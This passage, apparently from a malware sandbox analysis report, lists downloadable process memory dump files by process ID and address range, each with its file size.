4KB

Download
memory/3268-462-0x0000000000760000-0x0000000000761000-memory.dmp

Filesize
4KB

Download
memory/3272-309-0x0000000005EA0000-0x0000000005EA1000-memory.dmp

Filesize
4KB

Download
memory/3272-251-0x00000000009B0000-0x00000000009B1000-memory.dmp

Filesize
4KB

Download
memory/3368-324-0x0000016CDBDE0000-0x0000016CDBEAF000-memory.dmp

Filesize
828KB

Download
memory/3368-314-0x0000016CDBD70000-0x0000016CDBDDF000-memory.dmp

Filesize
444KB

Download
memory/3684-219-0x00000000048C0000-0x00000000048EF000-memory.dmp

Filesize
188KB

Download
memory/3736-466-0x0000000000700000-0x0000000000701000-memory.dmp

Filesize
4KB

Download
memory/3852-258-0x00000000059C0000-0x00000000059C1000-memory.dmp

Filesize
4KB

Download
memory/3852-268-0x0000000005B80000-0x0000000005B81000-memory.dmp

Filesize
4KB

Download
memory/3852-231-0x00000000005B0000-0x00000000005B1000-memory.dmp

Filesize
4KB

Download
memory/3852-264-0x0000000006520000-0x0000000006521000-memory.dmp

Filesize
4KB

Download
memory/3852-296-0x0000000005BF0000-0x0000000005BF1000-memory.dmp

Filesize
4KB

Download
memory/3852-255-0x0000000005A80000-0x0000000005A81000-memory.dmp

Filesize
4KB

Download
memory/3852-281-0x00000000058D0000-0x00000000058D1000-memory.dmp

Filesize
4KB

Download
memory/3852-248-0x0000000005F00000-0x0000000005F01000-memory.dmp

Filesize
4KB

Download
memory/3852-252-0x0000000005960000-0x0000000005961000-memory.dmp

Filesize
4KB

Download
memory/3872-443-0x0000000000630000-0x0000000000631000-memory.dmp

Filesize
4KB

Download
memory/3872-474-0x0000000005A80000-0x0000000005A81000-memory.dmp

Filesize
4KB

Download
memory/3872-471-0x0000000005A70000-0x0000000005A71000-memory.dmp

Filesize
4KB

Download
memory/3872-468-0x0000000005A60000-0x0000000005A61000-memory.dmp

Filesize
4KB

Download
memory/3872-479-0x0000000005A90000-0x0000000005A91000-memory.dmp

Filesize
4KB

Download
memory/3872-447-0x0000000005A50000-0x0000000005A51000-memory.dmp

Filesize
4KB

Download
memory/3896-187-0x0000000000D80000-0x0000000000D92000-memory.dmp

Filesize
72KB

Download
memory/3896-180-0x0000000000D60000-0x0000000000D70000-memory.dmp

Filesize
64KB

Download
memory/4140-428-0x0000000000400000-0x000000000046D000-memory.dmp

Filesize
436KB

Download
memory/4404-482-0x0000000004D60000-0x0000000004E30000-memory.dmp

Filesize
832KB

Download
memory/4404-455-0x0000000000E70000-0x0000000000E71000-memory.dmp

Filesize
4KB

Download
memory/4456-464-0x0000000000A70000-0x0000000000A72000-memory.dmp

Filesize
8KB

Download
memory/4560-232-0x0000000005240000-0x00000000052B6000-memory.dmp

Filesize
472KB

Download
memory/4560-216-0x0000000005260000-0x0000000005261000-memory.dmp

Filesize
4KB

Download
memory/4560-239-0x00000000059A0000-0x00000000059A1000-memory.dmp

Filesize
4KB

Download
memory/4560-208-0x00000000052C0000-0x00000000052C1000-memory.dmp

Filesize
4KB

Download
memory/4560-200-0x0000000000950000-0x0000000000951000-memory.dmp

Filesize
4KB

Download
memory/4568-371-0x00000000049C0000-0x00000000052E6000-memory.dmp

Filesize
9.1MB

Download
memory/4576-277-0x00000000025B0000-0x00000000025DF000-memory.dmp

Filesize
188KB

Download
memory/4584-230-0x0000000004DF0000-0x0000000004DF1000-memory.dmp

Filesize
4KB

Download
memory/4584-204-0x00000000001E0000-0x00000000001E1000-memory.dmp

Filesize
4KB

Download
memory/4644-458-0x0000000000700000-0x0000000000701000-memory.dmp

Filesize
4KB

Download
memory/4676-348-0x000000001B3C0000-0x000000001B3C2000-memory.dmp

Filesize
8KB

Download
memory/4676-306-0x00000000007A0000-0x00000000007A1000-memory.dmp

Filesize
4KB

Download
memory/4720-413-0x0000000005640000-0x0000000005641000-memory.dmp

Filesize
4KB

Download
memory/4804-367-0x0000000004CE0000-0x00000000052F8000-memory.dmp

Filesize
6.1MB

Download
memory/4804-297-0x0000000000400000-0x000000000041E000-memory.dmp

Filesize
120KB

Download
memory/4980-476-0x00000000057E0000-0x00000000057E1000-memory.dmp

Filesize
4KB

Download
memory/5000-307-0x0000000000400000-0x000000000041E000-memory.dmp

Filesize
120KB

Download
memory/5000-374-0x0000000005350000-0x00000000058F6000-memory.dmp

Filesize
5.6MB

Download
memory/5000-332-0x0000000005430000-0x0000000005431000-memory.dmp

Filesize
4KB

Download
memory/5036-196-0x0000000000A30000-0x0000000000A4C000-memory.dmp

Filesize
112KB

Download
memory/5036-210-0x000000001B2A0000-0x000000001B2A2000-memory.dmp

Filesize
8KB

Download
memory/5036-188-0x0000000000370000-0x0000000000371000-memory.dmp

Filesize
4KB

Download
memory/5116-146-0x0000000003E50000-0x0000000003F8F000-memory.dmp

Filesize
1.2MB

Download